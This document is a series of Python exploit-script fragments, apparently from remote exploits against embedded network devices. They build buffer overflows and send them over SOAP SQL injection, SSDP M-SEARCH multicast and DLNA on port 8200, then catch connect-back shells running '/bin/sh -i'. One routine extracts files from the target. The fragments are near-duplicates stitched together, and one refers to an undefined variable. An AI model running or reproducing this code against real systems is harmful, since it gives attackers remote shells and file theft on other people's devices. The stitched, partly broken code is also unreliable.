def main(command): logger=Logging() logger.LOG_INFO("Bulding overflow.") buf=build_overflow(logger) if command.startswith("find="): find_string=command.split("find=")[1] offset=find_offset(buf,find_string) logger.LOG_INFO("Offset of %s: %d" %(find_string,offset)) sys.exit(0) logger.LOG_INFO("Starting server.") server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger) pid=server.serve() target_ip=command if pid: try: send_overflow(buf,target_ip,logger) server.wait() except Exception as e: print e server.shutdown() else: logger.LOG_WARN("Failed to start connect-back server.") sys.exit(1) logger.LOG_INFO("Done.")
def do_overflow(callback_ip,target): Logging().LOG_INFO("doing overflow") connectback_server=ConnectbackServer(callback_ip,startcmd="/bin/sh -i") pid=connectback_server.serve() time.sleep(1) if pid: try: SoapSqlInjection(target,connectback_ip=callback_ip,action="overflow") connectback_server.wait() except Exception as e: print e Logging().LOG_WARN("Failed to connect. Killing connect-back server.") connectback_server.shutdown() raise e else: Logging().LOG_WARN("Failed to start connect-back server.")
def main(options): logger=Logging() logger.LOG_INFO("Bulding overflow.") connectback_ip=options["connectback_ip"] buf=build_overflow(connectback_ip,logger=logger) if options.has_key("overflow_file"): logger.LOG_INFO("Writing overflow string to file: %s" % options["overflow_file"]) open(options["overflow_file"],"wb").write(str(buf)) if options.has_key("find_string"): find_string=options["find_string"] offset=find_offset(buf,find_string) logger.LOG_INFO("Offset of %s: %d" %(find_string,offset)) sys.exit(0) logger.LOG_INFO("Starting server.") try: server=ConnectbackServer(connectback_ip,port=8080,logger=logger) pid=server.serve() except Exception as e: logger.LOG_WARN("Failed to start connect-back server: %s" % str(e)) sys.exit(1) if options.has_key("target"): target_ip=options["target"] target_ip=command try: send_overflow(buf,target_ip,logger) server.wait() except Exception as e: print e server.shutdown() else: try: server.wait() except: server.shutdown() logger.LOG_INFO("Done.")
msearch_string=msearch_crash.MsearchCrash(buffer_overflow_string) pid=None if len(sys.argv) > 1: search_string=sys.argv[1] if "0x" == search_string[0:2]: search_string_num=int(search_string,0) search_string=struct.pack(">L",search_string_num) offset=buffer_overflow_string.find_offset(search_string) if(offset < 0): print "Couldn't find string %s in the overflow buffer." % search_string else: print "Found string %s at\noffset: %d" % (search_string,offset) else: pid=connectback_server.serve() #sys.stdout.write(str(msearch_string)) if pid: try: logger.LOG_INFO("Sending exploit") send_multicast("239.255.255.250",1900,str(msearch_string)) connectback_server.wait() except Exception as e: print e connectback_server.shutdown() else: logger.LOG_WARN("Failed to start connect-backserver.") sys.exit(1)
def main(options, logger=None): outfile = None path = None connectback_ip = None port = None host = None if not logger: logger = Logging() try: port = options["port"] except KeyError: port = 8200 try: connectback_ip = options["connectback_ip"] except KeyError: pass try: host = options["target"] except KeyError: pass try: path = options["extract"] except KeyError: pass if path: try: outfile = options["outfile"] host = options["target"] logger.LOG_DEBUG("main() got path=%s" % path) albumart_extract(host, path, outfile=outfile, logger=logger) exit(0) except KeyError: print( "File extraction requires a remote path, local file, and target IP address." ) usage(1) if connectback_ip: buf = DLNA_Overflow(1536, connectback_ip, logger=logger).buf try: find_str = options["find_string"] logger.LOG_INFO("Finding offset of %s" % find_str) find = find_str if find_str.startswith("0x"): find = int(find_str, 16) offset = buf.find_offset(find) logger.LOG_INFO("Offset: %s" % offset) exit(0) except KeyError: pass if not host: print("Remote exploitation requires a target IP address.") usage(1) else: print( "No file extraction, overflow search string, or remote target was provided." ) usage(1) if not do_verification(host, port=port, logger=logger): exit(1) server = ConnectbackServer(connectback_ip, startcmd="/bin/sh -i") server.serve() try: do_overflow(host, buf, port=port, logger=logger) except Exception as e: server.shutdown() raise e server.wait()
def main(options,logger=None): outfile=None path=None connectback_ip=None port=None host=None if not logger: logger=Logging() try: port=options["port"] except KeyError: port=8200 try: connectback_ip=options["connectback_ip"] except KeyError: pass try: host=options["target"] except KeyError: pass try: path=options["extract"] except KeyError: pass if path: try: outfile=options["outfile"] host=options["target"] # logger.LOG_DEBUG("main() got path=%s" % path) albumart_extract(host,path,outfile=outfile,logger=logger) exit(0) except KeyError: print("File extraction requires a remote path, local file, and target IP address.") usage(1) if connectback_ip: try: logger.set_max_log_level(Logging.INFO) buf=DLNA_Overflow(1536,connectback_ip,logger=logger).buf logger.set_max_log_level(Logging.DEBUG) except DLNAOverflowException as e: logger.LOG_WARN("%s" % str(e)) exit(1) try: find_str=options["find_string"] logger.LOG_INFO("Finding offset of %s" % find_str) find=find_str if find_str.startswith("0x"): find=int(find_str,16) offset=buf.find_offset(find) logger.LOG_INFO("Offset: %s" % offset) exit(0) except KeyError: pass if not host: print("Remote exploitation requires a target IP address.") usage(1) else: print("No file extraction, overflow search string, or remote target was provided.") usage(1) if not do_verification(host,port=port,logger=logger): exit(1) server=ConnectbackServer(connectback_ip,startcmd="/bin/sh -i") server.serve() try: do_overflow(host,buf,port=port,logger=logger) except Exception as e: server.shutdown() raise e server.wait()